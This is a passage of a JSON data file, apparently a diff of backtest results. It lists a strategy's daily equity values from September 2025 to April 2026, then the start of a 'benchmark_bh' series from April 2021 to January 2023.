], + [ + "2025-09-09", + 11138.961494303643 + ], + [ + "2025-09-10", + 11140.268135855184 + ], + [ + "2025-09-11", + 11141.57493068063 + ], + [ + "2025-09-12", + 11142.881878797964 + ], + [ + "2025-09-15", + 11144.188980225164 + ], + [ + "2025-09-16", + 11145.496234980217 + ], + [ + "2025-09-17", + 11146.803643081108 + ], + [ + "2025-09-18", + 11148.111204545825 + ], + [ + "2025-09-19", + 11149.418919392358 + ], + [ + "2025-09-22", + 11150.726787638698 + ], + [ + "2025-09-23", + 11152.03480930284 + ], + [ + "2025-09-24", + 11153.342984402783 + ], + [ + "2025-09-25", + 11154.651312956523 + ], + [ + "2025-09-26", + 11155.959794982062 + ], + [ + "2025-09-29", + 11157.268430497401 + ], + [ + "2025-09-30", + 11158.577219520546 + ], + [ + "2025-10-01", + 11159.886162069504 + ], + [ + "2025-10-02", + 11161.195258162285 + ], + [ + "2025-10-03", + 11162.504507816899 + ], + [ + "2025-10-06", + 11163.81391105136 + ], + [ + "2025-10-07", + 11165.123467883683 + ], + [ + "2025-10-08", + 11166.433178331885 + ], + [ + "2025-10-09", + 11167.743042413987 + ], + [ + "2025-10-10", + 11169.053060148011 + ], + [ + "2025-10-13", + 11170.36323155198 + ], + [ + "2025-10-14", + 11171.673556643922 + ], + [ + "2025-10-15", + 11169.994035441861 + ], + [ + "2025-10-16", + 11169.034090541214 + ], + [ + "2025-10-17", + 11198.374053736432 + ], + [ + "2025-10-20", + 11224.783765091854 + ], + [ + "2025-10-21", + 11226.100473914488 + ], + [ + "2025-10-22", + 11224.427337191955 + ], + [ + "2025-10-23", + 11252.946744251676 + ], + [ + "2025-10-24", + 11254.266756696357 + ], + [ + "2025-10-27", + 11255.586923983401 + ], + [ + "2025-10-28", + 11256.907246130972 + ], + [ + "2025-10-29", + 11258.227723157233 + ], + [ + "2025-10-30", + 11256.558355080353 + ], + [ + "2025-10-31", + 11287.747372543501 + ], + [ + "2025-11-03", + 11327.521210174582 + ], + [ + "2025-11-04", + 11328.849970481075 + ], + [ + "2025-11-05", + 11330.178886656086 + ], + [ + "2025-11-06", + 11328.5179587179 + ], + [ + "2025-11-07", + 11360.328411718026 + ], + [ + "2025-11-10", + 11420.029496487028 + ], + [ + "2025-11-11", + 11421.369108359066 + ], + [ + "2025-11-12", + 11422.70887737255 + ], + [ + "2025-11-13", + 11421.058803545915 + ], + [ + "2025-11-14", + 11434.867710024595 + ], + [ + "2025-11-17", + 11445.613629971127 + ], + [ + "2025-11-18", + 11398.334864408364 + ], + [ + "2025-11-19", + 11458.91451799502 + ], + [ + "2025-11-20", + 11457.268691224492 + ], + [ + "2025-11-21", + 11490.61807914163 + ], + [ + "2025-11-24", + 11526.845976939523 + ], + [ + "2025-11-25", + 11528.198118781416 + ], + [ + "2025-11-26", + 11529.550419234569 + ], + [ + "2025-11-28", + 11527.912878317587 + ], + [ + "2025-12-01", + 11559.802579198496 + ], + [ + "2025-12-02", + 11593.732105245599 + ], + [ + "2025-12-03", + 11595.092093078747 + ], + [ + "2025-12-04", + 11596.452240443517 + ], + [ + "2025-12-05", + 11594.822547358624 + ], + [ + "2025-12-08", + 11624.27143348203 + ], + [ + "2025-12-09", + 11645.458681561437 + ], + [ + "2025-12-10", + 11646.82473711409 + ], + [ + "2025-12-11", + 11648.190952910132 + ], + [ + "2025-12-12", + 11649.557328968362 + ], + [ + "2025-12-15", + 11650.923865307577 + ], + [ + "2025-12-16", + 11652.29056194658 + ], + [ + "2025-12-17", + 11650.667418904175 + ], + [ + "2025-12-18", + 11684.343311128521 + ], + [ + "2025-12-19", + 11685.713927992634 + ], + [ + "2025-12-22", + 11687.084705635194 + ], + [ + "2025-12-23", + 11688.455644075062 + ], + [ + "2025-12-24", + 11689.826743331101 + ], + [ + "2025-12-26", + 11691.198003422176 + ], + [ + "2025-12-29", + 11692.569424367151 + ], + [ + "2025-12-30", + 11693.941006184898 + ], + [ + "2025-12-31", + 11695.312748894285 + ], + [ + "2026-01-02", + 11696.684652514185 + ], + [ + "2026-01-05", + 11698.056717063475 + ], + [ + "2026-01-06", + 11699.428942561033 + ], + [ + "2026-01-07", + 11700.801329025739 + ], + [ + "2026-01-08", + 11702.173876476472 + ], + [ + "2026-01-09", + 11703.546584932119 + ], + [ + "2026-01-12", + 11704.919454411565 + ], + [ + "2026-01-13", + 11706.292484933701 + ], + [ + "2026-01-14", + 11707.665676517416 + ], + [ + "2026-01-15", + 11709.039029181604 + ], + [ + "2026-01-16", + 11710.41254294516 + ], + [ + "2026-01-20", + 11711.78621782698 + ], + [ + "2026-01-21", + 11713.160053845966 + ], + [ + "2026-01-22", + 11714.534051021019 + ], + [ + "2026-01-23", + 11715.908209371044 + ], + [ + "2026-01-26", + 11717.282528914946 + ], + [ + "2026-01-27", + 11718.657009671635 + ], + [ + "2026-01-28", + 11720.031651660021 + ], + [ + "2026-01-29", + 11721.406454899019 + ], + [ + "2026-01-30", + 11722.781419407542 + ], + [ + "2026-02-02", + 11724.156545204507 + ], + [ + "2026-02-03", + 11725.531832308836 + ], + [ + "2026-02-04", + 11726.90728073945 + ], + [ + "2026-02-05", + 11728.282890515273 + ], + [ + "2026-02-06", + 11726.66866165523 + ], + [ + "2026-02-09", + 11767.760154295349 + ], + [ + "2026-02-10", + 11769.140556264962 + ], + [ + "2026-02-11", + 11770.52112016085 + ], + [ + "2026-02-12", + 11771.901846002012 + ], + [ + "2026-02-13", + 11770.292733807444 + ], + [ + "2026-02-17", + 11806.65896560261 + ], + [ + "2026-02-18", + 11808.043930547252 + ], + [ + "2026-02-19", + 11809.429057953424 + ], + [ + "2026-02-20", + 11810.814347840187 + ], + [ + "2026-02-23", + 11812.199800226597 + ], + [ + "2026-02-24", + 11810.595415131718 + ], + [ + "2026-02-25", + 11844.82756075595 + ], + [ + "2026-02-26", + 11846.217003018555 + ], + [ + "2026-02-27", + 11847.606608267899 + ], + [ + "2026-03-02", + 11848.996376523099 + ], + [ + "2026-03-03", + 11847.396307803276 + ], + [ + "2026-03-04", + 11883.841930526374 + ], + [ + "2026-03-05", + 11885.235949319447 + ], + [ + "2026-03-06", + 11886.6301316361 + ], + [ + "2026-03-09", + 11888.024477495517 + ], + [ + "2026-03-10", + 11889.418986916882 + ], + [ + "2026-03-11", + 11890.813659919382 + ], + [ + "2026-03-12", + 11892.208496522204 + ], + [ + "2026-03-13", + 11893.60349674454 + ], + [ + "2026-03-16", + 11894.998660605583 + ], + [ + "2026-03-17", + 11896.393988124528 + ], + [ + "2026-03-18", + 11897.789479320572 + ], + [ + "2026-03-19", + 11899.185134212918 + ], + [ + "2026-03-20", + 11897.590952820765 + ], + [ + "2026-03-23", + 11933.830520840249 + ], + [ + "2026-03-24", + 11935.230403480615 + ], + [ + "2026-03-25", + 11936.630450332414 + ], + [ + "2026-03-26", + 11938.030661414907 + ], + [ + "2026-03-27", + 11936.44103674736 + ], + [ + "2026-03-30", + 11942.423957454046 + ], + [ + "2026-03-31", + 11981.978127448137 + ], + [ + "2026-04-01", + 11983.38365798157 + ], + [ + "2026-04-02", + 11984.789353388955 + ], + [ + "2026-04-06", + 11983.20521368963 + ], + [ + "2026-04-07", + 12000.582181633197 + ], + [ + "2026-04-08", + 12048.565478841927 + ], + [ + "2026-04-09", + 12049.978820318973 + ], + [ + "2026-04-10", + 12051.392327586223 + ], + [ + "2026-04-13", + 12049.816000663126 + ], + [ + "2026-04-14", + 12110.377036123376 + ], + [ + "2026-04-15", + 12111.797628325648 + ], + [ + "2026-04-16", + 12113.218387168663 + ], + [ + "2026-04-17", + 12114.639312671965 + ], + [ + "2026-04-20", + 12116.060404855107 + ], + [ + "2026-04-21", + 12117.481663737639 + ], + [ + "2026-04-22", + 12118.903089339115 + ], + [ + "2026-04-23", + 12120.324681679094 + ] + ], + "benchmark_bh": [ + [ + "2021-04-26", + 10000.0 + ], + [ + "2021-04-27", + 9956.676989603086 + ], + [ + "2021-04-28", + 9923.014760145224 + ], + [ + "2021-04-29", + 9958.726050905641 + ], + [ + "2021-04-30", + 9893.452494317906 + ], + [ + "2021-05-03", + 9840.762346537873 + ], + [ + "2021-05-04", + 9663.671348977325 + ], + [ + "2021-05-05", + 9631.181852717782 + ], + [ + "2021-05-06", + 9703.77164436065 + ], + [ + "2021-05-07", + 9782.51138144933 + ], + [ + "2021-05-10", + 9535.461417584058 + ], + [ + "2021-05-11", + 9522.28888063905 + ], + [ + "2021-05-12", + 9275.825283372935 + ], + [ + "2021-05-13", + 9347.536905886136 + ], + [ + "2021-05-14", + 9553.903889819783 + ], + [ + "2021-05-17", + 9495.944727261747 + ], + [ + "2021-05-18", + 9431.842062846901 + ], + [ + "2021-05-19", + 9442.6709744207 + ], + [ + "2021-05-20", + 9625.326471340619 + ], + [ + "2021-05-21", + 9572.052718499572 + ], + [ + "2021-05-24", + 9733.044869195604 + ], + [ + "2021-05-25", + 9746.511049696548 + ], + [ + "2021-05-26", + 9780.462320146775 + ], + [ + "2021-05-27", + 9743.874701282119 + ], + [ + "2021-05-28", + 9774.609700307756 + ], + [ + "2021-06-01", + 9742.119283535498 + ], + [ + "2021-06-02", + 9761.144440319526 + ], + [ + "2021-06-03", + 9659.575987910353 + ], + [ + "2021-06-04", + 9823.493528013181 + ], + [ + "2021-06-07", + 9852.76583233542 + ], + [ + "2021-06-08", + 9857.44940102698 + ], + [ + "2021-06-09", + 9859.790264860045 + ], + [ + "2021-06-10", + 9962.530529954818 + ], + [ + "2021-06-11", + 9988.581960288897 + ], + [ + "2021-06-14", + 10084.302395422621 + ], + [ + "2021-06-15", + 10018.442472235725 + ], + [ + "2021-06-16", + 9981.852091832925 + ], + [ + "2021-06-17", + 10108.595646471937 + ], + [ + "2021-06-18", + 10029.271383809526 + ], + [ + "2021-06-21", + 10091.60206124889 + ], + [ + "2021-06-22", + 10185.67569913631 + ], + [ + "2021-06-23", + 10190.659354972808 + ], + [ + "2021-06-24", + 10253.663847719214 + ], + [ + "2021-06-25", + 10241.062028657218 + ], + [ + "2021-06-28", + 10365.611080984776 + ], + [ + "2021-06-29", + 10403.120133076682 + ], + [ + "2021-06-30", + 10386.708311889222 + ], + [ + "2021-07-01", + 10390.811037057909 + ], + [ + "2021-07-02", + 10510.085551531176 + ], + [ + "2021-07-06", + 10555.509171942662 + ], + [ + "2021-07-07", + 10577.780977070857 + ], + [ + "2021-07-08", + 10513.894633143926 + ], + [ + "2021-07-09", + 10579.537315330192 + ], + [ + "2021-07-12", + 10620.858210572991 + ], + [ + "2021-07-13", + 10620.858210572991 + ], + [ + "2021-07-14", + 10639.90822120031 + ], + [ + "2021-07-15", + 10565.178237496146 + ], + [ + "2021-07-16", + 10479.609216578323 + ], + [ + "2021-07-19", + 10393.742870053706 + ], + [ + "2021-07-20", + 10514.480999743086 + ], + [ + "2021-07-21", + 10595.656413474428 + ], + [ + "2021-07-22", + 10665.698225923461 + ], + [ + "2021-07-23", + 10790.244516712875 + ], + [ + "2021-07-26", + 10798.743610606185 + ], + [ + "2021-07-27", + 10679.762739688855 + ], + [ + "2021-07-28", + 10720.791832401146 + ], + [ + "2021-07-29", + 10739.840002003035 + ], + [ + "2021-07-30", + 10683.866385370255 + ], + [ + "2021-08-02", + 10684.744554499921 + ], + [ + "2021-08-03", + 10749.509988069234 + ], + [ + "2021-08-04", + 10765.03995807617 + ], + [ + "2021-08-05", + 10833.324511753153 + ], + [ + "2021-08-06", + 10785.849068500966 + ], + [ + "2021-08-09", + 10805.778168770667 + ], + [ + "2021-08-10", + 10750.389077711616 + ], + [ + "2021-08-11", + 10731.926354196172 + ], + [ + "2021-08-12", + 10770.607218973682 + ], + [ + "2021-08-13", + 10808.414517185098 + ], + [ + "2021-08-16", + 10813.104529465658 + ], + [ + "2021-08-17", + 10717.861840430778 + ], + [ + "2021-08-18", + 10614.703662563605 + ], + [ + "2021-08-19", + 10665.98818742854 + ], + [ + "2021-08-20", + 10776.470884965274 + ], + [ + "2021-08-23", + 10937.649899742357 + ], + [ + "2021-08-24", + 10971.058988203722 + ], + [ + "2021-08-25", + 10983.658966240288 + ], + [ + "2021-08-26", + 10913.911717859908 + ], + [ + "2021-08-27", + 11019.99988769745 + ], + [ + "2021-08-30", + 11143.669850382625 + ], + [ + "2021-08-31", + 11134.583469377441 + ], + [ + "2021-09-01", + 11153.041590329314 + ], + [ + "2021-09-02", + 11147.770734525882 + ], + [ + "2021-09-03", + 11182.05523057877 + ], + [ + "2021-09-07", + 11197.88068516707 + ], + [ + "2021-09-08", + 11158.907097346337 + ], + [ + "2021-09-09", + 11120.51527356119 + ], + [ + "2021-09-10", + 11036.115303790828 + ], + [ + "2021-09-13", + 11028.496220052615 + ], + [ + "2021-09-14", + 10997.143556995525 + ], + [ + "2021-09-15", + 11078.902575787883 + ], + [ + "2021-09-16", + 11086.520739013382 + ], + [ + "2021-09-17", + 10955.230772077277 + ], + [ + "2021-09-20", + 10728.862887882196 + ], + [ + "2021-09-21", + 10742.063960721354 + ], + [ + "2021-09-22", + 10842.400767118475 + ], + [ + "2021-09-23", + 10942.44392995966 + ], + [ + "2021-09-24", + 10952.70672621402 + ], + [ + "2021-09-27", + 10865.284713201836 + ], + [ + "2021-09-28", + 10557.821499881577 + ], + [ + "2021-09-29", + 10540.51309931016 + ], + [ + "2021-09-30", + 10501.787129409635 + ], + [ + "2021-10-01", + 10566.91616550119 + ], + [ + "2021-10-04", + 10345.122308984637 + ], + [ + "2021-10-05", + 10484.772372394154 + ], + [ + "2021-10-06", + 10551.955072351839 + ], + [ + "2021-10-07", + 10648.769997103147 + ], + [ + "2021-10-08", + 10595.669300652431 + ], + [ + "2021-10-11", + 10514.40275616235 + ], + [ + "2021-10-12", + 10477.730450127956 + ], + [ + "2021-10-13", + 10561.637025083328 + ], + [ + "2021-10-14", + 10756.146884741038 + ], + [ + "2021-10-15", + 10823.916871810596 + ], + [ + "2021-10-18", + 10932.761056715457 + ], + [ + "2021-10-19", + 11015.493977959795 + ], + [ + "2021-10-20", + 11001.119251409604 + ], + [ + "2021-10-21", + 11068.30011034186 + ], + [ + "2021-10-22", + 10975.300710792302 + ], + [ + "2021-10-25", + 11087.66493631755 + ], + [ + "2021-10-26", + 11122.576301529036 + ], + [ + "2021-10-27", + 11148.393921633622 + ], + [ + "2021-10-28", + 11272.201040713266 + ], + [ + "2021-10-29", + 11327.647203560617 + ], + [ + "2021-11-01", + 11366.374093973855 + ], + [ + "2021-11-02", + 11413.90016542534 + ], + [ + "2021-11-03", + 11535.067254039694 + ], + [ + "2021-11-04", + 11682.931052401014 + ], + [ + "2021-11-05", + 11694.079381886759 + ], + [ + "2021-11-08", + 11678.234596531453 + ], + [ + "2021-11-09", + 11597.849903221895 + ], + [ + "2021-11-10", + 11427.398563871293 + ], + [ + "2021-11-11", + 11459.080770480188 + ], + [ + "2021-11-12", + 11579.660571982668 + ], + [ + "2021-11-15", + 11577.019621004663 + ], + [ + "2021-11-16", + 11659.45981920578 + ], + [ + "2021-11-17", + 11665.621731316884 + ], + [ + "2021-11-18", + 11786.492414837156 + ], + [ + "2021-11-19", + 11852.210579066013 + ], + [ + "2021-11-22", + 11714.61325900991 + ], + [ + "2021-11-23", + 11661.220760028687 + ], + [ + "2021-11-24", + 11698.772155705463 + ], + [ + "2021-11-26", + 11476.978299188908 + ], + [ + "2021-11-29", + 11726.056152564304 + ], + [ + "2021-11-30", + 11553.842951878081 + ], + [ + "2021-12-01", + 11357.282189892383 + ], + [ + "2021-12-02", + 11439.133259956196 + ], + [ + "2021-12-03", + 11240.221508497574 + ], + [ + "2021-12-06", + 11330.289075051334 + ], + [ + "2021-12-07", + 11671.48815884662 + ], + [ + "2021-12-08", + 11723.708845142239 + ], + [ + "2021-12-09", + 11551.202921412792 + ], + [ + "2021-12-10", + 11676.769140289913 + ], + [ + "2021-12-13", + 11508.075059711358 + ], + [ + "2021-12-14", + 11388.964396501278 + ], + [ + "2021-12-15", + 11648.605133275973 + ], + [ + "2021-12-16", + 11349.064772889722 + ], + [ + "2021-12-17", + 11292.443115305909 + ], + [ + "2021-12-20", + 11182.903943301571 + ], + [ + "2021-12-21", + 11433.180304231293 + ], + [ + "2021-12-22", + 11572.418898457414 + ], + [ + "2021-12-23", + 11659.664173028406 + ], + [ + "2021-12-27", + 11852.367066227484 + ], + [ + "2021-12-28", + 11797.432708449414 + ], + [ + "2021-12-29", + 11795.671767626507 + ], + [ + "2021-12-30", + 11760.420733223356 + ], + [ + "2021-12-31", + 11686.984069883116 + ], + [ + "2022-01-03", + 11799.490974879116 + ], + [ + "2022-01-04", + 11646.444689934957 + ], + [ + "2022-01-05", + 11288.654284972878 + ], + [ + "2022-01-06", + 11280.720385886294 + ], + [ + "2022-01-07", + 11158.520482006232 + ], + [ + "2022-01-10", + 11165.862491417369 + ], + [ + "2022-01-11", + 11333.597397747377 + ], + [ + "2022-01-12", + 11378.540510521874 + ], + [ + "2022-01-13", + 11093.893125344099 + ], + [ + "2022-01-14", + 11162.926976370714 + ], + [ + "2022-01-18", + 10885.037075030346 + ], + [ + "2022-01-19", + 10765.478122128288 + ], + [ + "2022-01-20", + 10625.651320277579 + ], + [ + "2022-01-21", + 10331.016372147089 + ], + [ + "2022-01-24", + 10378.311394907227 + ], + [ + "2022-01-25", + 10137.726191836138 + ], + [ + "2022-01-26", + 10121.863916739258 + ], + [ + "2022-01-27", + 10019.932782320559 + ], + [ + "2022-01-28", + 10334.24737177511 + ], + [ + "2022-01-31", + 10664.721561933338 + ], + [ + "2022-02-01", + 10737.277294605768 + ], + [ + "2022-02-02", + 10824.522569176761 + ], + [ + "2022-02-03", + 10385.656165856508 + ], + [ + "2022-02-04", + 10516.670899490966 + ], + [ + "2022-02-07", + 10432.067496410691 + ], + [ + "2022-02-08", + 10549.273618814395 + ], + [ + "2022-02-09", + 10772.82289307757 + ], + [ + "2022-02-10", + 10529.005769865746 + ], + [ + "2022-02-11", + 10195.007857036275 + ], + [ + "2022-02-14", + 10207.64005301785 + ], + [ + "2022-02-15", + 10461.443818669673 + ], + [ + "2022-02-16", + 10458.80102666624 + ], + [ + "2022-02-17", + 10147.716516326996 + ], + [ + "2022-02-18", + 10031.974929652117 + ], + [ + "2022-02-22", + 9931.218369457167 + ], + [ + "2022-02-23", + 9676.826396180755 + ], + [ + "2022-02-24", + 10002.012240793976 + ], + [ + "2022-02-25", + 10157.114030629693 + ], + [ + "2022-02-28", + 10187.37036304377 + ], + [ + "2022-03-01", + 10031.387642540243 + ], + [ + "2022-03-02", + 10199.709835982125 + ], + [ + "2022-03-03", + 10054.009242499962 + ], + [ + "2022-03-04", + 9908.304966966942 + ], + [ + "2022-03-07", + 9542.876147499643 + ], + [ + "2022-03-08", + 9498.519401324305 + ], + [ + "2022-03-09", + 9840.449372214931 + ], + [ + "2022-03-10", + 9731.172546334237 + ], + [ + "2022-03-11", + 9529.363020850258 + ], + [ + "2022-03-14", + 9346.3568085861 + ], + [ + "2022-03-15", + 9639.521697911476 + ], + [ + "2022-03-16", + 9997.020300343047 + ], + [ + "2022-03-17", + 10118.045629999362 + ], + [ + "2022-03-18", + 10325.140739490207 + ], + [ + "2022-03-21", + 10296.436391512836 + ], + [ + "2022-03-22", + 10498.789019498392 + ], + [ + "2022-03-23", + 10347.90501892068 + ], + [ + "2022-03-24", + 10577.904325774605 + ], + [ + "2022-03-25", + 10569.082131918492 + ], + [ + "2022-03-28", + 10732.6121361685 + ], + [ + "2022-03-29", + 10917.315773878261 + ], + [ + "2022-03-30", + 10796.728608274065 + ], + [ + "2022-03-31", + 10662.90539034756 + ], + [ + "2022-04-01", + 10642.61360806833 + ], + [ + "2022-04-04", + 10861.7296930983 + ], + [ + "2022-04-05", + 10620.552600351764 + ], + [ + "2022-04-06", + 10389.964165360536 + ], + [ + "2022-04-07", + 10414.672567644107 + ], + [ + "2022-04-08", + 10269.08243568769 + ], + [ + "2022-04-11", + 10026.145322630962 + ], + [ + "2022-04-12", + 9983.794373660596 + ], + [ + "2022-04-13", + 10186.731527219883 + ], + [ + "2022-04-14", + 9953.789341217585 + ], + [ + "2022-04-18", + 9961.437881362664 + ], + [ + "2022-04-19", + 10184.084132652879 + ], + [ + "2022-04-20", + 10035.554803598947 + ], + [ + "2022-04-21", + 9827.90922750481 + ], + [ + "2022-04-22", + 9570.555044313021 + ], + [ + "2022-04-25", + 9693.496881441 + ], + [ + "2022-04-26", + 9327.617931256294 + ], + [ + "2022-04-27", + 9316.440145363686 + ], + [ + "2022-04-28", + 9647.322122654454 + ], + [ + "2022-04-29", + 9213.205564941205 + ], + [ + "2022-05-02", + 9367.028762616432 + ], + [ + "2022-05-03", + 9377.028292234436 + ], + [ + "2022-05-04", + 9694.086009578303 + ], + [ + "2022-05-05", + 9205.850668352065 + ], + [ + "2022-05-06", + 9095.558516947238 + ], + [ + "2022-05-09", + 8739.677255355105 + ], + [ + "2022-05-10", + 8845.852873900529 + ], + [ + "2022-05-11", + 8583.50214769424 + ], + [ + "2022-05-12", + 8563.20576285144 + ], + [ + "2022-05-13", + 8880.558964776674 + ], + [ + "2022-05-16", + 8777.617107397415 + ], + [ + "2022-05-17", + 9004.968099171621 + ], + [ + "2022-05-18", + 8562.912119295503 + ], + [ + "2022-05-19", + 8517.030083552178 + ], + [ + "2022-05-20", + 8490.559819932985 + ], + [ + "2022-05-23", + 8631.737013935917 + ], + [ + "2022-05-24", + 8448.204268399048 + ], + [ + "2022-05-25", + 8566.442285555748 + ], + [ + "2022-05-26", + 8803.794647973386 + ], + [ + "2022-05-27", + 9091.146499506467 + ], + [ + "2022-05-31", + 9067.029986898342 + ], + [ + "2022-06-01", + 8999.970635644406 + ], + [ + "2022-06-02", + 9246.440676499522 + ], + [ + "2022-06-03", + 9005.851791377576 + ], + [ + "2022-06-06", + 9035.8513007443 + ], + [ + "2022-06-07", + 9113.792032796764 + ], + [ + "2022-06-08", + 9048.207342911513 + ], + [ + "2022-06-09", + 8805.854755428516 + ], + [ + "2022-06-10", + 8495.265480929693 + ], + [ + "2022-06-13", + 8100.267952046074 + ], + [ + "2022-06-14", + 8114.97222214807 + ], + [ + "2022-06-15", + 8317.620334714993 + ], + [ + "2022-06-16", + 7982.033616940233 + ], + [ + "2022-06-17", + 8079.089716022748 + ], + [ + "2022-06-21", + 8282.924369478707 + ], + [ + "2022-06-22", + 8270.842640100424 + ], + [ + "2022-06-23", + 8394.018287457895 + ], + [ + "2022-06-24", + 8681.627882551047 + ], + [ + "2022-06-27", + 8617.976269366322 + ], + [ + "2022-06-28", + 8355.41382523569 + ], + [ + "2022-06-29", + 8363.076173071488 + ], + [ + "2022-06-30", + 8259.350038859444 + ], + [ + "2022-07-01", + 8313.865563352401 + ], + [ + "2022-07-05", + 8456.196159786647 + ], + [ + "2022-07-06", + 8510.415279185523 + ], + [ + "2022-07-07", + 8692.530435142009 + ], + [ + "2022-07-08", + 8703.4348287584 + ], + [ + "2022-07-11", + 8517.49126042216 + ], + [ + "2022-07-12", + 8434.978341716596 + ], + [ + "2022-07-13", + 8417.592618077157 + ], + [ + "2022-07-14", + 8447.651960770325 + ], + [ + "2022-07-15", + 8600.88603030825 + ], + [ + "2022-07-18", + 8528.097407919042 + ], + [ + "2022-07-19", + 8790.363446955593 + ], + [ + "2022-07-20", + 8929.751164241468 + ], + [ + "2022-07-21", + 9057.937162304157 + ], + [ + "2022-07-22", + 8899.101772898282 + ], + [ + "2022-07-25", + 8848.41834283594 + ], + [ + "2022-07-26", + 8674.556503877982 + ], + [ + "2022-07-27", + 9041.138725776593 + ], + [ + "2022-07-28", + 9129.544766880615 + ], + [ + "2022-07-29", + 9296.038822071429 + ], + [ + "2022-08-01", + 9290.441184254336 + ], + [ + "2022-08-02", + 9262.740195135808 + ], + [ + "2022-08-03", + 9514.987373787351 + ], + [ + "2022-08-04", + 9559.485878920728 + ], + [ + "2022-08-05", + 9481.39602380851 + ], + [ + "2022-08-08", + 9450.746632465323 + ], + [ + "2022-08-09", + 9343.776611447256 + ], + [ + "2022-08-10", + 9604.56983014055 + ], + [ + "2022-08-11", + 9550.055226160308 + ], + [ + "2022-08-12", + 9736.001556034693 + ], + [ + "2022-08-15", + 9814.680539284214 + ], + [ + "2022-08-16", + 9791.693495776826 + ], + [ + "2022-08-17", + 9680.01137017305 + ], + [ + "2022-08-18", + 9703.290216210948 + ], + [ + "2022-08-19", + 9514.103681581397 + ], + [ + "2022-08-22", + 9263.624807854478 + ], + [ + "2022-08-23", + 9255.96430104411 + ], + [ + "2022-08-24", + 9282.77699539311 + ], + [ + "2022-08-25", + 9446.917299572855 + ], + [ + "2022-08-26", + 9059.705467228781 + ], + [ + "2022-08-29", + 8970.416654431518 + ], + [ + "2022-08-30", + 8870.517091573802 + ], + [ + "2022-08-31", + 8818.948128280075 + ], + [ + "2022-09-01", + 8822.782063736116 + ], + [ + "2022-09-02", + 8698.128072959102 + ], + [ + "2022-09-06", + 8635.656557074411 + ], + [ + "2022-09-07", + 8810.110285707817 + ], + [ + "2022-09-08", + 8855.786126603085 + ], + [ + "2022-09-09", + 9049.391122262406 + ], + [ + "2022-09-12", + 9156.949350905063 + ], + [ + "2022-09-13", + 8654.811506151189 + ], + [ + "2022-09-14", + 8723.471629015703 + ], + [ + "2022-09-15", + 8578.194471382227 + ], + [ + "2022-09-16", + 8525.739974857115 + ], + [ + "2022-09-19", + 8592.132874905728 + ], + [ + "2022-09-20", + 8523.645808431547 + ], + [ + "2022-09-21", + 8371.02019779793 + ], + [ + "2022-09-22", + 8267.991812223507 + ], + [ + "2022-09-23", + 8133.37511233707 + ], + [ + "2022-09-26", + 8099.72116749364 + ], + [ + "2022-09-27", + 8102.968736350523 + ], + [ + "2022-09-28", + 8264.154194716606 + ], + [ + "2022-09-29", + 8025.917219580299 + ], + [ + "2022-09-30", + 7889.825858325177 + ], + [ + "2022-10-03", + 8074.920713938615 + ], + [ + "2022-10-04", + 8328.806405222032 + ], + [ + "2022-10-05", + 8324.3778185524 + ], + [ + "2022-10-06", + 8258.840995328306 + ], + [ + "2022-10-07", + 7944.143472584508 + ], + [ + "2022-10-10", + 7864.731761214215 + ], + [ + "2022-10-11", + 7756.686581345571 + ], + [ + "2022-10-12", + 7754.028140625991 + ], + [ + "2022-10-13", + 7935.879109433405 + ], + [ + "2022-10-14", + 7697.3466497157315 + ], + [ + "2022-10-17", + 7951.524143529657 + ], + [ + "2022-10-18", + 8014.4043670596 + ], + [ + "2022-10-19", + 7985.177167860372 + ], + [ + "2022-10-20", + 7944.439877678588 + ], + [ + "2022-10-21", + 8130.71851264292 + ], + [ + "2022-10-24", + 8220.166574139797 + ], + [ + "2022-10-25", + 8390.207364819717 + ], + [ + "2022-10-26", + 8204.817945137625 + ], + [ + "2022-10-27", + 8055.440823873608 + ], + [ + "2022-10-28", + 8301.94032113559 + ], + [ + "2022-10-31", + 8205.408914300358 + ], + [ + "2022-11-01", + 8121.566775235005 + ], + [ + "2022-11-02", + 7843.180717541502 + ], + [ + "2022-11-03", + 7689.967359539655 + ], + [ + "2022-11-04", + 7813.659874786337 + ], + [ + "2022-11-07", + 7899.569485408539 + ], + [ + "2022-11-08", + 7957.133748012037 + ], + [ + "2022-11-09", + 7773.510792229142 + ], + [ + "2022-11-10", + 8347.107118499718 + ], + [ + "2022-11-11", + 8500.913746946084 + ], + [ + "2022-11-14", + 8426.520670895441 + ], + [ + "2022-11-15", + 8543.127539521984 + ], + [ + "2022-11-16", + 8426.520670895441 + ], + [ + "2022-11-17", + 8407.919870472815 + ], + [ + "2022-11-18", + 8408.218116592325 + ], + [ + "2022-11-21", + 8321.720298345535 + ], + [ + "2022-11-22", + 8441.57473582896 + ], + [ + "2022-11-23", + 8526.301487612982 + ], + [ + "2022-11-25", + 8470.212806890884 + ], + [ + "2022-11-28", + 8345.927021199685 + ], + [ + "2022-11-29", + 8282.754074626519 + ], + [ + "2022-11-30", + 8660.328138849402 + ], + [ + "2022-12-01", + 8670.955458138718 + ], + [ + "2022-12-02", + 8636.414139038474 + ], + [ + "2022-12-05", + 8491.468365982231 + ], + [ + "2022-12-06", + 8315.519724700422 + ], + [ + "2022-12-07", + 8281.572136301054 + ], + [ + "2022-12-08", + 8379.581886555829 + ], + [ + "2022-12-09", + 8326.147043989738 + ], + [ + "2022-12-12", + 8430.651931958277 + ], + [ + "2022-12-13", + 8521.281931780619 + ], + [ + "2022-12-14", + 8458.107144182024 + ], + [ + "2022-12-15", + 8174.115164056998 + ], + [ + "2022-12-16", + 8096.175352517248 + ], + [ + "2022-12-19", + 7982.397219462474 + ], + [ + "2022-12-20", + 7976.184679152071 + ], + [ + "2022-12-21", + 8091.888524805654 + ], + [ + "2022-12-22", + 7893.9184578540035 + ], + [ + "2022-12-23", + 7911.673307091971 + ], + [ + "2022-12-27", + 7799.815363559718 + ], + [ + "2022-12-28", + 7696.836225415522 + ], + [ + "2022-12-29", + 7884.449143559573 + ], + [ + "2022-12-30", + 7879.714026156001 + ], + [ + "2023-01-03", + 7826.449478442099 + ], + [ + "2023-01-04", + 7863.734845944373 + ], + [ + "2023-01-05", + 7740.631919091351 + ], + [ + "2023-01-06", + 7954.284761160549 + ], + [ + "2023-01-09", + 8005.774560360826 + ], + [ + "2023-01-10", + 8073.539024354097 + ], + [ + "2023-01-11", + 8213.213941606908 + ], + [ + "2023-01-12", + 8257.60198521454 + ], + [ + "2023-01-13", + 8314.418791493836 + ], + [ + "2023-01-17", + 8331.285345962277 + ], + [ + "2023-01-18", + 8222.977819969989 + ], + [ + "2023-01-19", + 8142.193624142324 + ], + [ + "2023-01-20", + 8365.019375411872 + ], + [ + "2023-01-23", + 8550.858005298654 + ], + [ + "2023-01-24", + 8533.399561154769 + ], + [ + "2023-01-25", + 8514.460012053194 + ], + [ + 